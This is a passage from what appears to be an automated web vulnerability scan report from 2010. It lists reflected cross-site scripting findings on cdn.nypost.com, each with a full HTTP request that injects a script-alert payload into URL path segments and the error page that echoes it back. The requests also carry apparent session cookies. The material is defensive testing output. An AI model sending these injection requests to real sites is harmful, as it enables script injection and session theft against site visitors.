<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig4ac23<script>alert(1)</script>b341005b818/WebPortal/nypost/scripts/functions.js</p>
...[SNIP]...

1.72. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/functions.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1a1b8<script>alert(1)</script>da1bbd1a30d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal1a1b8<script>alert(1)</script>da1bbd1a30d/nypost/scripts/functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal1a1b8<script>alert(1)</script>da1bbd1a30d/nypost/scripts/functions.js</p>
...[SNIP]...

1.73. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/functions.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3ccf8<script>alert(1)</script>f386733da04 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost3ccf8<script>alert(1)</script>f386733da04/scripts/functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:05 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost3ccf8<script>alert(1)</script>f386733da04/scripts/functions.js</p>
...[SNIP]...

1.74. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/functions.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 891ef<script>alert(1)</script>c89d8834617 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts891ef<script>alert(1)</script>c89d8834617/functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:13 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts891ef<script>alert(1)</script>c89d8834617/functions.js</p>
...[SNIP]...

1.75. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/functions.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e3a9c<script>alert(1)</script>7ba55653210 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/functions.jse3a9c<script>alert(1)</script>7ba55653210 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Date: Mon, 01 Nov 2010 21:54:21 GMT
Connection: close
Vary: Accept-Encoding

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/functions.jse3a9c<script>alert(1)</script>7ba55653210</p>
...[SNIP]...

1.76. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b86f2<script>alert(1)</script>2fca814566f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfigb86f2<script>alert(1)</script>2fca814566f/WebPortal/nypost/scripts/jquery-drag-1.7.2.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfigb86f2<script>alert(1)</script>2fca814566f/WebPortal/nypost/scripts/jquery-drag-1.7.2.js</p>
...[SNIP]...

1.77. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8db7a<script>alert(1)</script>5eb1a95cd1d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal8db7a<script>alert(1)</script>5eb1a95cd1d/nypost/scripts/jquery-drag-1.7.2.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:05 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal8db7a<script>alert(1)</script>5eb1a95cd1d/nypost/scripts/jquery-drag-1.7.2.js</p>
...[SNIP]...

1.78. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f327<script>alert(1)</script>8246f276b58 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost6f327<script>alert(1)</script>8246f276b58/scripts/jquery-drag-1.7.2.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:13 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost6f327<script>alert(1)</script>8246f276b58/scripts/jquery-drag-1.7.2.js</p>
...[SNIP]...

1.79. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a6d39<script>alert(1)</script>33b854153c7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scriptsa6d39<script>alert(1)</script>33b854153c7/jquery-drag-1.7.2.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scriptsa6d39<script>alert(1)</script>33b854153c7/jquery-drag-1.7.2.js</p>
...[SNIP]...

1.80. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f20cd<script>alert(1)</script>9b484f6ac9d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.jsf20cd<script>alert(1)</script>9b484f6ac9d HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:27 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.jsf20cd<script>alert(1)</script>9b484f6ac9d</p>
...[SNIP]...

1.81. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43fbe<script>alert(1)</script>43cda8e60ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig43fbe<script>alert(1)</script>43cda8e60ed/WebPortal/nypost/scripts/jquery-ui-tabs.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:52 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig43fbe<script>alert(1)</script>43cda8e60ed/WebPortal/nypost/scripts/jquery-ui-tabs.js</p>
...[SNIP]...

1.82. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68a1c<script>alert(1)</script>474fc215b3f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal68a1c<script>alert(1)</script>474fc215b3f/nypost/scripts/jquery-ui-tabs.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:59 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal68a1c<script>alert(1)</script>474fc215b3f/nypost/scripts/jquery-ui-tabs.js</p>
...[SNIP]...

1.83. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d479f<script>alert(1)</script>6f5cd614b4b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostd479f<script>alert(1)</script>6f5cd614b4b/scripts/jquery-ui-tabs.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:07 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostd479f<script>alert(1)</script>6f5cd614b4b/scripts/jquery-ui-tabs.js</p>
...[SNIP]...

1.84. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7ffbb<script>alert(1)</script>ca4259161be was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts7ffbb<script>alert(1)</script>ca4259161be/jquery-ui-tabs.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
